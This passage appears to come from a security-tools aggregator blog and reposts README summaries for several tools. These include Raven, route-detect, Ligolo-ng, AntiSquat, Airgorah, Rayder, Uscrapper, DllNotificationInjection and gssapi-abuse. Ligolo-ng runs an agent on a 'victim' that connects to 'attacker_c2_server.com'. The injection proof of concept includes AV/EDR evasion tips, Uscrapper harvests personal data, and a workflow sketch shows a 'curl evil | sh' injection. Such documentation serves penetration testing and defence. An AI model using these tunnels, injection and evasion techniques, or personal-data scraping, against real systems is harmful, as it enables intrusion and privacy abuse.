  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created: a framework for CI/CD security analysis, with GitHub Actions workflows as the first use case. Our focus was on complex scenarios where each issue isn't a threat on its own, but where combined issues pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to set up the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
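A schema-agnostic Cypher query is a convenient starting point for exploring what was indexed (illustrative only; it simply counts nodes per label and does not assume Raven's exact data model):

MATCH (n)
RETURN labels(n) AS label, count(*) AS nodes
ORDER BY nodes DESC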

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven uses two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities: download, index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case: a user can pass a pull request title (which is a controllable parameter) to an action parameter named data. That action parameter may be used in a run command, - run: echo ${{ inputs.data }}, which creates a path to code execution (see the sketch after this list).
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
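To make the taint-analysis use case concrete, here is a minimal sketch of the vulnerable pattern described above (a hypothetical workflow written for illustration, not taken from Raven's query library):

# The pull request title is attacker-controlled; interpolating it directly
# into a run command lets a title like `"; curl evil | sh #` execute code.
on: pull_request_target
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.pull_request.title }}"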

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R


Find authentication (authn) and authorization (authz) security bugs in web application routes.

Web application HTTP route authn and authz bugs are some of the most common security issues found today, and industry-standard resources highlight the severity of the issue.

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.

Installing

Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.

Findings:

/tmp/stdin
routes.rules.test-route-detect
Found '1 == 1', your route-detect installation is working correctly

1┆ print(1 == 1)


Ran 1 rule on 1 file: 1 finding.

Using

route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json

Contributing

route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev

Linting

Lint all project files with the following command:

$ poetry run pre-commit run --all-files

Testing

Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/


Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • A SYN is translated to a connect() on the remote host
  • A SYN-ACK is sent back if the connect() succeeds
  • An RST is sent if the connect() returns ECONNRESET, ECONNABORTED or ECONNREFUSED
  • Nothing is sent on timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
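For example (illustrative values, tunneling the agent connection through a local SOCKS5 proxy):

$ ./agent -connect attacker_c2_server.com:11601 --socks 127.0.0.1:9050 --socks-user proxyuser --socks-pass proxypass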

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] » ifconfig
[...]
┌───────────────────────────────────────┐
│              Interface 3              │
├──────────────┬────────────────────────┤
│ Name         │ wlp3s0                 │
│ Hardware MAC │ de:ad:be:ef:ca:fe      │
│ MTU          │ 1500                   │
│ Flags        │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24        │
└──────────────┴────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx     Mét     MTU     État          Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] » listener_list
┌──────────────────────────────────────────────────────────────────────────────┐
│                                Active listeners                               │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an nmap SYN scan, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Antisquat - Leverages AI Techniques Such As NLP, ChatGPT And More To Empower Detection Of Typosquatting And Phishing Domains

By: Zion3R


AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.


How to use

  • Clone the project via git clone https://github.com/redhuntlabs/antisquat.
  • Install all dependencies by typing pip install -r requirements.txt.
  • Get a ChatGPT API key at https://platform.openai.com/account/api-keys
  • Create a file named .openai-key and paste your ChatGPT API key in there.
  • (Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
  • Create a file named 'domains.txt'. Type in a line-separated list of domains you'd like to scan.
  • (Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you'd like to ignore. Regular expressions are supported.
  • Run antisquat using python3.8 antisquat.py domains.txt

Examples:

Let's say you'd like to run antisquat on "flipkart.com".

Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.

AntiSquat generates several permutations of the domain, iterates through them one by one, and tries to extract all contact information from each page.

Test case:

A test case for amazon.com is attached. To run it without any API keys, simply run python3.8 test.py

Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.

If you'd like to know more about the tool, make sure to check out our blog.

Acknowledgements

To know more about our Attack Surface Management platform, check out NVADR.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for any damage you may cause by using this software.

Requirements

This software only works on Linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any questions about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or propose a feature, do not hesitate to open an issue or submit a pull request.



Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive modules and execute them in parallel when the commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@v0.0.4

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
  VAR_NAME: value
  # Add more variables...

parallel: true|false
modules:
  - name: task-name
    cmds:
      - command-1
      - command-2
      # Add more commands...
    silent: true|false
  # Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
  - name: example-task
    cmds:
      - echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
  ORG: "example.org"
  OUTPUT_DIR: "results"

modules:
  - name: example-task
    cmds:
      - echo "Organization {{ORG}}"
      - echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
  ORG: "Acme, Inc"
  OUTPUT_DIR: "results-dir"

parallel: false
modules:
  - name: reverse-whois
    silent: false
    cmds:
      - mkdir -p {{OUTPUT_DIR}}
      - revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

  - name: finding-subdomains
    cmds:
      - xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
    silent: false

  - name: cleaning-subdomains
    cmds:
      - cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
      - rm *.out
    silent: true

  - name: resolving-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
    silent: false

  - name: checking-alive-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
    silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
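As a minimal sketch, two independent modules that are safe to run concurrently could be declared like this (module names and commands are illustrative):

parallel: true
modules:
  - name: fetch-a
    cmds:
      - echo "module A"
    silent: false
  - name: fetch-b
    cmds:
      - echo "module B"
    silent: false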

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

Inspiration for this project comes from the awesome Taskfile project.



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R


Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on a webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-web-scraping techniques.
  • Introduced Crawl and Scrape: an advanced module to crawl a website and scrape it from within.
  • Implemented multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl.
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.
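
For example, an illustrative invocation that scrapes https://example.com, crawls 10 links with 4 threads and writes a report (flag values are arbitrary):

python Uscrapper-v2.0.py -u https://example.com -c 10 -t 4 -O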

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some anti-web-scraping methods, Uscrapper uses Selenium, which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


DllNotificationInjection - A POC Of A New "Threadless" Process Injection Technique That Works By Utilizing The Concept Of DLL Notification Callbacks In Local And Remote Processes

By: Zion3R

DllNotificationInjection is a POC of a new "threadless" process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.

An accompanying blog post with more details is available here:

https://shorsec.io/blog/dll-notification-injection/


How It Works?

DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts the entry manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first (now second) entry of the list.
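For reference, the commonly cited reversed layout of this undocumented structure looks roughly as follows (the field names follow public research and may vary between Windows builds):

typedef struct _LDR_DLL_NOTIFICATION_ENTRY {
    LIST_ENTRY List;                         // links the entry into LdrpDllNotificationList
    PLDR_DLL_NOTIFICATION_FUNCTION Callback; // invoked by the loader on DLL load/unload
    PVOID Context;                           // opaque context passed back to the callback
} LDR_DLL_NOTIFICATION_ENTRY, *PLDR_DLL_NOTIFICATION_ENTRY;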

Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.

After manually registering our new entry in the remote process, we just need to wait for the remote process to trigger our DLL notification callback by loading or unloading a DLL. This obviously doesn't happen regularly in every process, so prior work is needed to find suitable candidates for this injection technique. From my brief searching, RuntimeBroker.exe and explorer.exe seem to be suitable candidates, although I encourage you to find others as well.

OPSEC Notes

This is a POC. In order for this to be OPSEC-safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One might also want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower-level APIs and use indirect syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes, or even go the extra mile and modify the trampoline shellcode to suit your needs, or at least change the default hash values in @C5pider's ShellcodeTemplate project, which was utilized to create the trampoline shellcode.



Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R


gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI-abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI-based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


Prerequisites

gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

Windows

On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. On Windows, krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

Linux

The libkrb5-dev package needs to be installed prior to installing the Python requirements.

All

Once the requirements are satisfied, you can install the Python dependencies via the pip/pip3 tool:

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

Example

python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently, DNS mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.

Examples

Adding a DNS A record for host ahost.ad.ginge.com

python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully

Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a .; this is important, otherwise the record becomes relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones from A records.

python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution

nslookup ahost.ad.ginge.com
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50
nslookup 192.168.128.50
Server: WIN-AF8KI8E5414.ad.ginge.com
Address: 192.168.128.1

Name: ahost.ad.ginge.com
Address: 192.168.128.50


ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

By: Zion3R


